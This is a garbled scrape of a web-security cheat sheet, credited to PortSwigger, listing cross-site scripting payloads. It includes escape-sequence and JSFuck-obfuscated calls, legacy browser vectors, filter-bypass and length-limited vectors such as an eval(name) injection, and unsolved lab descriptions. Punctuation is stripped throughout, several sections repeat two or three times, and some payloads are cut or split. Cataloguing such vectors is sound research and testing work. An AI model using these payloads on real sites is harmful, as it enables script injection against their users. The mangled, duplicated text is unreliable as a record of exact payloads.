We received a request from twitter about this next lab It occurs within a frameset but before abody tag with equals filtered You would think you could inject a closing frameset followed by ascript block but that would be too easy
NA NA 128279
Injection occurs insidesingle quoted stringonly characters a-z0-9+` are allowed
The injection occurs within a single quoted string and the challenge is to execute arbitrarycode using the charset a-zA-Z0-9+`
NA NA 128279
VBScript protocol used to work in IE lta href=vbscriptMsgBox+1gtXSSltagt lta href= onclick=vbsMsgbox+1gtXSSltagt lta href= onclick=VBSMsgbox+1gtXSSltagt lta href= onclick=vbscriptMsgbox+1gtXSSltagt lta href= onclick=VBSCRIPTMsgbox+1gtXSSltagt lta href= language=vbs onclick=vbscriptMsgbox+1gtXSSltagt
JScript compact was a minimal version of JS thatwasnt widely used in IE
lta href= onclick=jscriptcompactalert(1)gttestltagt lta href= onclick=JSCRIPTCOMPACTalert(1)gttestltagt
JScriptEncode allows encoded JavaScript lta href= language=JScriptEncode onclick=~^CAAAAA==C^+D`8mgIAAA==^~gtXSSltagt lta href= onclick=JScriptEncode~^CAAAAA==C^+D`8mgIAAA==^~gtXSSltagt
VBScriptEncoded allows encoded VBScript ltiframe onload=VBScriptEncode~^CAAAAA==ko$K6FoQIAAA==^~gt ltiframe language=VBScriptEncode onload=~^CAAAAA==ko$K6FoQIAAA==^~gt
JavaScript entities used to work in NetscapeNavigator
lta title=ampalert(1)gtXSSltagt
JavaScript stylesheets used to be supported byNetscape Navigator
ltlink href=xssjs rel=stylesheet type=textjavascriptgt
Button used to consume markup ltformgtltbutton name=x formaction=xgtltbgtstealme
IE9 select elements and plaintext used to consumemarkup
ltform action=xgtltbuttongtXSSltbuttongtltselect name=xgtltoptiongtltplaintextgtltscriptgttoken=supersecretltscriptgt
XBL Firefox only lt= 2 ltdiv style=-moz-bindingurl(businessinfocouklabsxblxblxmlxss)gt ltdiv style=-moz-bindingurl(businessinfocouklabsxblxblxmlxss)gt ltdiv style=-moz-bindin67url(businessinfocouklab sxblxblxmlxss)gt ltdiv style=-moz-bindinampx5c67url(businessinfocouklab sxblxblxmlxss)gt
XBL also worked in FF35 using data urls ltimg src=blah style=-moz-binding url(datatextxmlcharset=utf-83C3Fxml20version3D2210223F3E3Cbindings20xmlns3D22 http3Awwwmozillaorgxbl223E3Cbinding20id3D22loader223E3Cimplementation3E3Cconstructor3E3C215BCDATA5Bvar20url203D2022alertjs 223B20var20scr203D20documentcreateElement2822script22293B20scrsetAttribute2822src222Curl293B20var20bodyElement203D20 documentgetElementsByTagName2822html2229item280293B20bodyElementappendChild28scr293B205D5D3E3Cconstructor3E3Cimplementation3E3C binding3E3Cbindings3E) gt
CSS expressions lt=IE7 ltdiv style=xssexpression(alert(1))gt ltdiv style=xssexpression(1)-alert(1)gt ltdiv style=xssexpressio6e(alert(1))gt ltdiv style=xssexpressio006e(alert(1))gt ltdiv style=xssexpressio00006e(alert(1))gt ltdiv style=xssexpressio6e(alert(1))gt ltdiv style=xssexpressioampx5c6e(alert(1))gt
In quirks mode IE allowed you to use = instead of ltdiv style=xss=expression(alert(1))gt ltdiv style=colorampx3dredgttestltdivgt
Behaviors for older modes of IE lta style=behaviorurl(defaultAnchorClick) folder=javascriptalert(1)gtXSSltagt
Older versions of IE supported event handlers infunctions
ltscriptgt function windowonload() alert(1) ltscriptgt ltscriptgt function windowonload() alert(1) ltscriptgt ltscriptgt function windowlocation() ltscriptgt ltbodygt ltscriptgt functionltimg src=1 onerror=alert(1)gtdocumentbodyinnerHTML() ltscriptgt ltbodygt ltbodygt
y
ltscriptgt function documentbodyinnerHTML() x = ltimg src=1 onerror=alert(1)gt ltscriptgt ltbodygt
GreyMagic HTML+time exploit (no longer workseven in 5 docmode)
ltHTMLgtltBODYgtltxmlnamespace prefix=t ns=urnschemas-microsoft-comtimegtltimport namespace=t implementation=defaulttime2gtlttset attributeName=innerHTML to=XSSltimg src=1 onerror=alert(1)gtgt ltBODYgtltHTMLgt
Firefox allows NULLS after amp lta href=javascriptampx6aavascriptalert(1)gtFirefoxltagt
Firefox allows NULLs inside named entities lta href=javascriptampcolonalert(1)gtFirefoxltagt
Firefox allows NULL characters inside openingcomments
lt-- gtltimg title=--gtltiframeonload=alert(1)gtgt --gt lt-- gtltimg title=--gtltiframeonload=alert(1)gtgt --gt
Safari used to allow any tag to have a onload eventinside SVG
ltsvggtltxss onload=alert(1)gt
Isindex using src attribute ltisindex type=image src=evil
Isindex using submit ltisindex type=submit style=width100height100 value=XSS formaction=evil
Isindex and formaction ltisindex type=submit formaction=javascriptalert(1)gt
Isindex and action ltisindex type=submit action=javascriptalert(1)gt
CreditsBrought to you by PortSwigger lovingly constructed by Gareth Heyes
This cheat sheet wouldnt be possible without the web security community who share their research Big thanks to James Kettle Mario Heiderich EduardoVela Masato Kinugawa Filedescriptor LeverOne Ben Hayak Alex Infuumlhr Mathias Karlsson Jan Horn Ian Hickey Gaacutebor Molnaacuter tsetnep Psych0tr1aSkyphire Abdulrhman Alqabandi brainpillow Kyo Yosuke Hasegawa White Jordan Algol jackmasa wpulog Bolk Robert Hansen David LindsaySuperhei Michal Zalewski Renaud Lifchitz Roman Ivanov Frederik Braun Krzysztof Kotowicz Giorgio Maone GreyMagic Marcus Niemietz SoroushDalili Stefano Di Paola Roman Shafigullin Lewis Ardern Michał Bentkowski SOslashᴘᴀS avanish46 Juuso Kaumlenmaumlki jinmo123 itszn13 Martin Bajanik DavidGranqvist Andrea (theMiddle) Menin simps0n hahwul Paweł Hałdrzyński Jun Kokatsu RenwaX23 sratarun har1sec Yann C gadhiyasavan p4fgdiofeher
You can contribute to this cheat sheet by creating a new issue or updating the JSON and creating a pull request
XSS into a JavaScript string string concatenation(globalThis)
globalThis[ale+rt](globalThis[doc+ument][dom+ain])
XSS into a JavaScript string comment syntax(window)
window[fooalertbar](window[foodocumentbar][domain])
XSS into a JavaScript string comment syntax (self) self[fooalertbar](self[foodocumentbar][domain])
XSS into a JavaScript string comment syntax (this) this[fooalertbar](this[foodocumentbar][domain])
XSS into a JavaScript string comment syntax (top) top[fooalertbar](top[foodocumentbar][domain])
XSS into a JavaScript string comment syntax(parent)
parent[fooalertbar](parent[foodocumentbar][domain])
XSS into a JavaScript string comment syntax(frames)
frames[fooalertbar](frames[foodocumentbar][domain])
XSS into a JavaScript string comment syntax(globalThis)
globalThis[fooalertbar](globalThis[foodocumentbar][domain])
XSS into a JavaScript string hex escape sequence(window)
window[x61x6cx65x72x74](window[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(self)
self[x61x6cx65x72x74](self[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(this)
this[x61x6cx65x72x74](this[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(top)
top[x61x6cx65x72x74](top[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(parent)
parent[x61x6cx65x72x74](parent[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(frames)
frames[x61x6cx65x72x74](frames[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(globalThis)
globalThis[x61x6cx65x72x74](globalThis[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequenceand base64 encoded string (window)
window[x65x76x61x6c](window[x61x6cx65x72x74](window[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (self)
self[x65x76x61x6c](self[x61x6cx65x72x74](self[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (this)
this[x65x76x61x6c](this[x61x6cx65x72x74](this[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (top)
top[x65x76x61x6c](top[x61x6cx65x72x74](top[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (parent)
parent[x65x76x61x6c](parent[x61x6cx65x72x74](parent[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (frames)
frames[x65x76x61x6c](frames[x61x6cx65x72x74](frames[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequence globalThis[x65x76x61x6c](globalThis[x61x6cx65x72x74]
XSS into a JavaScript string hex escape sequence
and base64 encoded string (globalThis) (globalThis[x61x74x6fx62](WFNT)))
XSS into a JavaScript string octal escape sequence(window)
window[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(self)
self[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(this)
this[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(top)
top[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(parent)
parent[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(frames)
frames[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(globalThis)
globalThis[141154145162164](130123123)
XSS into a JavaScript string unicode escape(window)
window[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape (self) self[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape (this) this[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape (top) top[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape(parent)
parent[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape(frames)
frames[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape(globalThis)
globalThis[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string RegExp sourceproperty (window)
window[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (self)
self[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (this)
this[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (top)
top[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (parent)
parent[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (frames)
frames[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (globalThis)
globalThis[alsource+ertsource](XSSsource)
XSS into a JavaScript string HieroglyphyJSFuck(window)
window[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(self)
self[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(this)
this[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(top)
top[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(parent)
parent[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(frames)
frames[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(globalThis)
globalThis[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
Impossible labs
Classic vectors (XSS crypt)
Image src with JavaScript protocol ltimg src=javascriptalert(1)gt
Body background with JavaScript protocol ltbody background=javascriptalert(1)gt
Iframe data urls no longer work as modern browsersuse a null origin
ltiframe src=datatexthtmlltimg src=1 onerror=alert(documentdomain)gtgt
Title Description Lengthlimit
Closest vector Link
Basic context WAFblocks lt[a-zA-Z]
This lab captures the scenario when you cant use an open tag followed by an alphanumericcharacter Sometimes you can solve this problem by bypassing the WAF entirely but whatabout when thats not an option Certain versions of NET have this behaviour and its onlyknown to be exploitable in old IE with lttag
NA NA 128279
Script based injectionbut quotes forwardslash and backslash areescaped
We often encounter this situation in the wild you have an injection inside a JavaScript variableand can inject angle brackets but quotes and forwardbackslashes are escaped so you cantsimply close the script block
The closest weve got to solving this is when you have multiple injection points The first withina script based context and the second in HTML
NA NA 128279
innerHTML context butno equals allowed
You have a site that processes the query string and URL decodes the parameters but splits onthe equals then assigns to innerHTML In this context ltscriptgt doesnt work and we cant use =to create an event
NA NA 128279
Basic context lengthlimit
This labs injection occurs within the basic HTML context but has a length limitation of 15Filedescriptor came up with a vector that could execute JavaScript in 16 characters ltqoncut=alert`` but can you beat it
15 ltq oncut=alert`` 128279
Attribute context lengthlimit
The context of this lab inside an attribute with a length limitation of 14 characters We came upwith a vector that executes JavaScript in 15 charactersoncut=alert``+ the plus is a trailingspace Do you think you can beat it
14 oncut=alert`` 128279
Basic context lengthlimit arbitrary code
Its all well and good executing JavaScript but if all you can do is call alert what use is that Inthis lab we demonstrate the shortest possible way to execute arbitrary code
19 ltqoncut=eval(name)
128279
Attribute context lengthlimit arbitrary code
Again calling alert proves you can call a function but we created another lab to find theshortest possible attribute based injection with arbitrary JavaScript
17 See link 128279
Injection occurs inside aframeset but before thebody
We received a request from twitter about this next lab It occurs within a frameset but before abody tag with equals filtered You would think you could inject a closing frameset followed by ascript block but that would be too easy
NA NA 128279
Injection occurs insidesingle quoted stringonly characters a-z0-9+` are allowed
The injection occurs within a single quoted string and the challenge is to execute arbitrarycode using the charset a-zA-Z0-9+`
NA NA 128279
VBScript protocol used to work in IE lta href=vbscriptMsgBox+1gtXSSltagt lta href= onclick=vbsMsgbox+1gtXSSltagt lta href= onclick=VBSMsgbox+1gtXSSltagt lta href= onclick=vbscriptMsgbox+1gtXSSltagt lta href= onclick=VBSCRIPTMsgbox+1gtXSSltagt lta href= language=vbs onclick=vbscriptMsgbox+1gtXSSltagt
JScript compact was a minimal version of JS thatwasnt widely used in IE
lta href= onclick=jscriptcompactalert(1)gttestltagt lta href= onclick=JSCRIPTCOMPACTalert(1)gttestltagt
JScriptEncode allows encoded JavaScript lta href= language=JScriptEncode onclick=~^CAAAAA==C^+D`8mgIAAA==^~gtXSSltagt lta href= onclick=JScriptEncode~^CAAAAA==C^+D`8mgIAAA==^~gtXSSltagt
VBScriptEncoded allows encoded VBScript ltiframe onload=VBScriptEncode~^CAAAAA==ko$K6FoQIAAA==^~gt ltiframe language=VBScriptEncode onload=~^CAAAAA==ko$K6FoQIAAA==^~gt
JavaScript entities used to work in NetscapeNavigator
lta title=ampalert(1)gtXSSltagt
JavaScript stylesheets used to be supported byNetscape Navigator
ltlink href=xssjs rel=stylesheet type=textjavascriptgt
Button used to consume markup ltformgtltbutton name=x formaction=xgtltbgtstealme
IE9 select elements and plaintext used to consumemarkup
ltform action=xgtltbuttongtXSSltbuttongtltselect name=xgtltoptiongtltplaintextgtltscriptgttoken=supersecretltscriptgt
XBL Firefox only lt= 2 ltdiv style=-moz-bindingurl(businessinfocouklabsxblxblxmlxss)gt ltdiv style=-moz-bindingurl(businessinfocouklabsxblxblxmlxss)gt ltdiv style=-moz-bindin67url(businessinfocouklab sxblxblxmlxss)gt ltdiv style=-moz-bindinampx5c67url(businessinfocouklab sxblxblxmlxss)gt
XBL also worked in FF35 using data urls ltimg src=blah style=-moz-binding url(datatextxmlcharset=utf-83C3Fxml20version3D2210223F3E3Cbindings20xmlns3D22 http3Awwwmozillaorgxbl223E3Cbinding20id3D22loader223E3Cimplementation3E3Cconstructor3E3C215BCDATA5Bvar20url203D2022alertjs 223B20var20scr203D20documentcreateElement2822script22293B20scrsetAttribute2822src222Curl293B20var20bodyElement203D20 documentgetElementsByTagName2822html2229item280293B20bodyElementappendChild28scr293B205D5D3E3Cconstructor3E3Cimplementation3E3C binding3E3Cbindings3E) gt
CSS expressions lt=IE7 ltdiv style=xssexpression(alert(1))gt ltdiv style=xssexpression(1)-alert(1)gt ltdiv style=xssexpressio6e(alert(1))gt ltdiv style=xssexpressio006e(alert(1))gt ltdiv style=xssexpressio00006e(alert(1))gt ltdiv style=xssexpressio6e(alert(1))gt ltdiv style=xssexpressioampx5c6e(alert(1))gt
In quirks mode IE allowed you to use = instead of ltdiv style=xss=expression(alert(1))gt ltdiv style=colorampx3dredgttestltdivgt
Behaviors for older modes of IE lta style=behaviorurl(defaultAnchorClick) folder=javascriptalert(1)gtXSSltagt
Older versions of IE supported event handlers infunctions
ltscriptgt function windowonload() alert(1) ltscriptgt ltscriptgt function windowonload() alert(1) ltscriptgt ltscriptgt function windowlocation() ltscriptgt ltbodygt ltscriptgt functionltimg src=1 onerror=alert(1)gtdocumentbodyinnerHTML() ltscriptgt ltbodygt ltbodygt
y
ltscriptgt function documentbodyinnerHTML() x = ltimg src=1 onerror=alert(1)gt ltscriptgt ltbodygt
GreyMagic HTML+time exploit (no longer workseven in 5 docmode)
ltHTMLgtltBODYgtltxmlnamespace prefix=t ns=urnschemas-microsoft-comtimegtltimport namespace=t implementation=defaulttime2gtlttset attributeName=innerHTML to=XSSltimg src=1 onerror=alert(1)gtgt ltBODYgtltHTMLgt
Firefox allows NULLS after amp lta href=javascriptampx6aavascriptalert(1)gtFirefoxltagt
Firefox allows NULLs inside named entities lta href=javascriptampcolonalert(1)gtFirefoxltagt
Firefox allows NULL characters inside openingcomments
lt-- gtltimg title=--gtltiframeonload=alert(1)gtgt --gt lt-- gtltimg title=--gtltiframeonload=alert(1)gtgt --gt
Safari used to allow any tag to have a onload eventinside SVG
ltsvggtltxss onload=alert(1)gt
Isindex using src attribute ltisindex type=image src=evil
Isindex using submit ltisindex type=submit style=width100height100 value=XSS formaction=evil
Isindex and formaction ltisindex type=submit formaction=javascriptalert(1)gt
Isindex and action ltisindex type=submit action=javascriptalert(1)gt
CreditsBrought to you by PortSwigger lovingly constructed by Gareth Heyes
This cheat sheet wouldnt be possible without the web security community who share their research Big thanks to James Kettle Mario Heiderich EduardoVela Masato Kinugawa Filedescriptor LeverOne Ben Hayak Alex Infuumlhr Mathias Karlsson Jan Horn Ian Hickey Gaacutebor Molnaacuter tsetnep Psych0tr1aSkyphire Abdulrhman Alqabandi brainpillow Kyo Yosuke Hasegawa White Jordan Algol jackmasa wpulog Bolk Robert Hansen David LindsaySuperhei Michal Zalewski Renaud Lifchitz Roman Ivanov Frederik Braun Krzysztof Kotowicz Giorgio Maone GreyMagic Marcus Niemietz SoroushDalili Stefano Di Paola Roman Shafigullin Lewis Ardern Michał Bentkowski SOslashᴘᴀS avanish46 Juuso Kaumlenmaumlki jinmo123 itszn13 Martin Bajanik DavidGranqvist Andrea (theMiddle) Menin simps0n hahwul Paweł Hałdrzyński Jun Kokatsu RenwaX23 sratarun har1sec Yann C gadhiyasavan p4fgdiofeher
You can contribute to this cheat sheet by creating a new issue or updating the JSON and creating a pull request
XSS into a JavaScript string hex escape sequence
and base64 encoded string (globalThis) (globalThis[x61x74x6fx62](WFNT)))
XSS into a JavaScript string octal escape sequence(window)
window[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(self)
self[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(this)
this[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(top)
top[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(parent)
parent[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(frames)
frames[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(globalThis)
globalThis[141154145162164](130123123)
XSS into a JavaScript string unicode escape(window)
window[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape (self) self[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape (this) this[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape (top) top[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape(parent)
parent[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape(frames)
frames[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape(globalThis)
globalThis[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string RegExp sourceproperty (window)
window[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (self)
self[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (this)
this[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (top)
top[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (parent)
parent[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (frames)
frames[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (globalThis)
globalThis[alsource+ertsource](XSSsource)
XSS into a JavaScript string HieroglyphyJSFuck(window)
window[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(self)
self[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(this)
this[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(top)
top[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(parent)
parent[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(frames)
frames[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(globalThis)
globalThis[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
Impossible labs
Classic vectors (XSS crypt)
Image src with JavaScript protocol ltimg src=javascriptalert(1)gt
Body background with JavaScript protocol ltbody background=javascriptalert(1)gt
Iframe data urls no longer work as modern browsersuse a null origin
ltiframe src=datatexthtmlltimg src=1 onerror=alert(documentdomain)gtgt
Title Description Lengthlimit
Closest vector Link
Basic context WAFblocks lt[a-zA-Z]
This lab captures the scenario when you cant use an open tag followed by an alphanumericcharacter Sometimes you can solve this problem by bypassing the WAF entirely but whatabout when thats not an option Certain versions of NET have this behaviour and its onlyknown to be exploitable in old IE with lttag
NA NA 128279
Script based injectionbut quotes forwardslash and backslash areescaped
We often encounter this situation in the wild you have an injection inside a JavaScript variableand can inject angle brackets but quotes and forwardbackslashes are escaped so you cantsimply close the script block
The closest weve got to solving this is when you have multiple injection points The first withina script based context and the second in HTML
NA NA 128279
innerHTML context butno equals allowed
You have a site that processes the query string and URL decodes the parameters but splits onthe equals then assigns to innerHTML In this context ltscriptgt doesnt work and we cant use =to create an event
NA NA 128279
Basic context lengthlimit
This labs injection occurs within the basic HTML context but has a length limitation of 15Filedescriptor came up with a vector that could execute JavaScript in 16 characters ltqoncut=alert`` but can you beat it
15 ltq oncut=alert`` 128279
Attribute context lengthlimit
The context of this lab inside an attribute with a length limitation of 14 characters We came upwith a vector that executes JavaScript in 15 charactersoncut=alert``+ the plus is a trailingspace Do you think you can beat it
14 oncut=alert`` 128279
Basic context lengthlimit arbitrary code
Its all well and good executing JavaScript but if all you can do is call alert what use is that Inthis lab we demonstrate the shortest possible way to execute arbitrary code
19 ltqoncut=eval(name)
128279
Attribute context lengthlimit arbitrary code
Again calling alert proves you can call a function but we created another lab to find theshortest possible attribute based injection with arbitrary JavaScript
17 See link 128279
Injection occurs inside aframeset but before thebody
We received a request from twitter about this next lab It occurs within a frameset but before abody tag with equals filtered You would think you could inject a closing frameset followed by ascript block but that would be too easy
NA NA 128279
Injection occurs insidesingle quoted stringonly characters a-z0-9+` are allowed
The injection occurs within a single quoted string and the challenge is to execute arbitrarycode using the charset a-zA-Z0-9+`
NA NA 128279
VBScript protocol used to work in IE lta href=vbscriptMsgBox+1gtXSSltagt lta href= onclick=vbsMsgbox+1gtXSSltagt lta href= onclick=VBSMsgbox+1gtXSSltagt lta href= onclick=vbscriptMsgbox+1gtXSSltagt lta href= onclick=VBSCRIPTMsgbox+1gtXSSltagt lta href= language=vbs onclick=vbscriptMsgbox+1gtXSSltagt
JScript compact was a minimal version of JS thatwasnt widely used in IE
lta href= onclick=jscriptcompactalert(1)gttestltagt lta href= onclick=JSCRIPTCOMPACTalert(1)gttestltagt
JScriptEncode allows encoded JavaScript lta href= language=JScriptEncode onclick=~^CAAAAA==C^+D`8mgIAAA==^~gtXSSltagt lta href= onclick=JScriptEncode~^CAAAAA==C^+D`8mgIAAA==^~gtXSSltagt
VBScriptEncoded allows encoded VBScript ltiframe onload=VBScriptEncode~^CAAAAA==ko$K6FoQIAAA==^~gt ltiframe language=VBScriptEncode onload=~^CAAAAA==ko$K6FoQIAAA==^~gt
JavaScript entities used to work in NetscapeNavigator
lta title=ampalert(1)gtXSSltagt
JavaScript stylesheets used to be supported byNetscape Navigator
ltlink href=xssjs rel=stylesheet type=textjavascriptgt
Button used to consume markup ltformgtltbutton name=x formaction=xgtltbgtstealme
IE9 select elements and plaintext used to consumemarkup
ltform action=xgtltbuttongtXSSltbuttongtltselect name=xgtltoptiongtltplaintextgtltscriptgttoken=supersecretltscriptgt
XBL Firefox only lt= 2 ltdiv style=-moz-bindingurl(businessinfocouklabsxblxblxmlxss)gt ltdiv style=-moz-bindingurl(businessinfocouklabsxblxblxmlxss)gt ltdiv style=-moz-bindin67url(businessinfocouklab sxblxblxmlxss)gt ltdiv style=-moz-bindinampx5c67url(businessinfocouklab sxblxblxmlxss)gt
XBL also worked in FF35 using data urls ltimg src=blah style=-moz-binding url(datatextxmlcharset=utf-83C3Fxml20version3D2210223F3E3Cbindings20xmlns3D22 http3Awwwmozillaorgxbl223E3Cbinding20id3D22loader223E3Cimplementation3E3Cconstructor3E3C215BCDATA5Bvar20url203D2022alertjs 223B20var20scr203D20documentcreateElement2822script22293B20scrsetAttribute2822src222Curl293B20var20bodyElement203D20 documentgetElementsByTagName2822html2229item280293B20bodyElementappendChild28scr293B205D5D3E3Cconstructor3E3Cimplementation3E3C binding3E3Cbindings3E) gt
CSS expressions lt=IE7 ltdiv style=xssexpression(alert(1))gt ltdiv style=xssexpression(1)-alert(1)gt ltdiv style=xssexpressio6e(alert(1))gt ltdiv style=xssexpressio006e(alert(1))gt ltdiv style=xssexpressio00006e(alert(1))gt ltdiv style=xssexpressio6e(alert(1))gt ltdiv style=xssexpressioampx5c6e(alert(1))gt
In quirks mode IE allowed you to use = instead of ltdiv style=xss=expression(alert(1))gt ltdiv style=colorampx3dredgttestltdivgt
Behaviors for older modes of IE lta style=behaviorurl(defaultAnchorClick) folder=javascriptalert(1)gtXSSltagt
Older versions of IE supported event handlers infunctions
ltscriptgt function windowonload() alert(1) ltscriptgt ltscriptgt function windowonload() alert(1) ltscriptgt ltscriptgt function windowlocation() ltscriptgt ltbodygt ltscriptgt functionltimg src=1 onerror=alert(1)gtdocumentbodyinnerHTML() ltscriptgt ltbodygt ltbodygt
y
ltscriptgt function documentbodyinnerHTML() x = ltimg src=1 onerror=alert(1)gt ltscriptgt ltbodygt
GreyMagic HTML+time exploit (no longer workseven in 5 docmode)
ltHTMLgtltBODYgtltxmlnamespace prefix=t ns=urnschemas-microsoft-comtimegtltimport namespace=t implementation=defaulttime2gtlttset attributeName=innerHTML to=XSSltimg src=1 onerror=alert(1)gtgt ltBODYgtltHTMLgt
Firefox allows NULLS after amp lta href=javascriptampx6aavascriptalert(1)gtFirefoxltagt
Firefox allows NULLs inside named entities lta href=javascriptampcolonalert(1)gtFirefoxltagt
Firefox allows NULL characters inside openingcomments
lt-- gtltimg title=--gtltiframeonload=alert(1)gtgt --gt lt-- gtltimg title=--gtltiframeonload=alert(1)gtgt --gt
Safari used to allow any tag to have a onload eventinside SVG
ltsvggtltxss onload=alert(1)gt
Isindex using src attribute ltisindex type=image src=evil
Isindex using submit ltisindex type=submit style=width100height100 value=XSS formaction=evil
Isindex and formaction ltisindex type=submit formaction=javascriptalert(1)gt
Isindex and action ltisindex type=submit action=javascriptalert(1)gt
CreditsBrought to you by PortSwigger lovingly constructed by Gareth Heyes
